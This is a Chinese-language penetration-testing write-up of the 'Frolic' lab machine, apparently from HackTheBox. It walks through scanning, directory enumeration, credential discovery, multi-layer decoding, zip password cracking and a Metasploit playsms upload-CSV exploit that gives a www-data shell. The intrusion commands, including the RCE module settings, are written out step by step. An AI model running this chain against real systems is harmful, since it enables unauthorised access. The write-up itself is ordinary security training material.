Frolic(CTF-like again)

10.10.10.111

10.10.10.111
categories:
- training

10.10.10.111

scan

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
Nmap 7.70 scan initiated Fri Mar 22 16:23:48 2019 as: nmap -Pn -sV -sC -p22,137,139,445,1880,9999 -oN nmap-result 10.10.10.111
Nmap scan report for 10.10.10.111
Host is up (0.29s latency).

PORT     STATE  SERVICE     VERSION
22/tcp   open   ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 87:7b:91:2a:0f:11:b6:57:1e:cb:9f:77:cf:35:e2:21 (RSA)
|   256 b7:9b:06:dd:c2:5e:28:44:78:41:1e:67:7d:1e:b7:62 (ECDSA)
|_  256 21:cf:16:6d:82:a4:30:c3:c6:9c:d7:38:ba:b5:02:b0 (ED25519)
137/tcp  closed netbios-ns
139/tcp  open   netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open   netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
1880/tcp open   http        Node.js (Express middleware)
9999/tcp open   http        nginx 1.10.3 (Ubuntu)
|_http-server-header: nginx/1.10.3 (Ubuntu)
Service Info: Host: FROLIC; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -1h55m35s, deviation: 3h10m30s, median: -5m37s
|_nbstat: NetBIOS name: FROLIC, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: frolic
|   NetBIOS computer name: FROLIC\x00
|   Domain name: \x00
|   FQDN: frolic
|_  System time: 2019-03-22T13:48:27+05:30
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done at Fri Mar 22 16:24:14 2019 -- 1 IP address (1 host up) scanned in 26.78 seconds

web

nikto
1
2
nikto -h http://forlic.htb:1880
+ Retrieved x-powered-by header: Express
searchsploit
1
2
3
4
5
6
7
searchsploit Express
searchsploit Node-RED
searchsploit Node.js
google express.js exploit
searchsploit playsms

Node.JS - 'node-serialize' Remote Code Execution  未验证
wget
1
2
3
4
5
6
7
8
9
wget http://10.10.10.111:9999 
wget http://10.10.10.111:1880

9999端口,内容显示

Thank you for using nginx. http://forlic.htb:1880 

于是`echo 10.10.10.111 forlic.htb >> /etc/hosts`
就可以通过域名访问,http://forlic.htb:1880

发现一个登陆表单

1
2
3
4
5
6
7
8
9
gobuster -u http://forlic.htb:1880  -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

gobuster -u http://10.10.10.111:9999  -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
/admin (Status: 301)
/test (Status: 301)
/dev (Status: 301)
/backup (Status: 301)
/loop (Status: 301)
/playsms

9999目录发现

1
curl http://10.10.10.111:9999/admin/ -o admin


是一个登陆表单


有3次登陆错误尝试限制

curl http://10.10.10.111:9999/admin/


之所以用curl,就是可以很方便的查看源代码

curl http://10.10.10.111:9999/admin/js/login.js
源码中以明文给出了登陆口令。admin/superduperlooperpassword_lol

登陆后,有一串不明所以的字符


考验一点密码学的知识

google “ook decode”,访问在线密码破解https://www.dcode.fr/ook-language

获得一个目录/asdiSIAJJ0QWE9JAS

curl http://10.10.10.111:9999/asdiSIAJJ0QWE9JAS/ -o unknown

疑似base64编码,sed去除换行符,base64解码并且保存为someformat

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
sed -i ':a;N;s/\n//g;ta' unknown 
cat unknown | base64 -d > someformat
file someformat
提示为zip类型,需要解压
someformat: Zip archive data, at least v2.0 to extract

mv someformat getzip;unzip getzip
发现需要密码
Archive:  getzip
[getzip] index.php password: 
password incorrect--reenter: 


cd /usr/share/seclists/Passwords/
fcrackzip -D -u -p Most-Popular-Letter-Passes.txt /root/Desktop/10.10.10.111/getzip

fcrackzip在指定密码列表的时候,要用相对路径。如果使用绝对路径,路径名称太长,工具会报错。

用password作为密码,解压缩得到index.php

查看后,搜索hex to ascii

然后base64解码一次

然后搜索brainfuck decode,在线解码

获得一个口令idkwhatispass

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
curl http://10.10.10.111:9999/test/ -o test
phpinfo()页面
PHP Version 7.0.32-0ubuntu0.16.04.1

curl http://10.10.10.111:9999/dev/ -o dev
403不允许访问 nginx/1.10.3 (Ubuntu)

curl http://10.10.10.111:9999/backup/ -o backup
password.txt
user.txt
loop/

gobuster -u http://10.10.10.111:9999/backup/loop/  -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt
14:01

http://10.10.10.111:9999/backup/loop 403 Forbidden
http://10.10.10.111:9999/backup/loop/password.txt 404
http://10.10.10.111:9999/backup/loop/user.txt 404

http://10.10.10.111:9999/backup/password.txt
password - imnothuman

http://10.10.10.111:9999/backup/user.txt
user - admin

获得口令:admin/imnothuman

尝试登陆

1
2
3
4
- http://10.10.10.111:9999/admin/
- http://forlic.htb:1880/
- ssh admin@10.10.10.111
失败

1880目录发现

1
2
3
curl http://forlic.htb:1880/red -o red
curl http://forlic.htb:1880/vendor -o vendor

139、445

1
smbclient -L //10.10.10.111

picture2, 查看共享的硬盘,服务版本为:Samba 4.3.11-Ubuntu

searchsploit samba 4.X,查看是否有rce的exp,没有。

smbmap -H 10.10.10.111

对目标硬盘进行访问,发现没有查看权限

获得webshell

https://www.rapid7.com/db/modules/exploit/multi/http/playsms_uploadcsv_exec

1
2
3
4
5
6
7
metasploit
search playsms
use multi/http/playsms_uploadcsv_exec
set RHOSTS 10.10.10.111 
set RPORT 9999
set TARGETURI /playsms
set LHOST tun0

获得www-data的shell

find / -name “user.txt” 2>/dev/null

总结

提权不会了。以后学一下缓冲区溢出的东西。

最近怎么老遇到CTF类型的靶机,下回得看清楚再做。。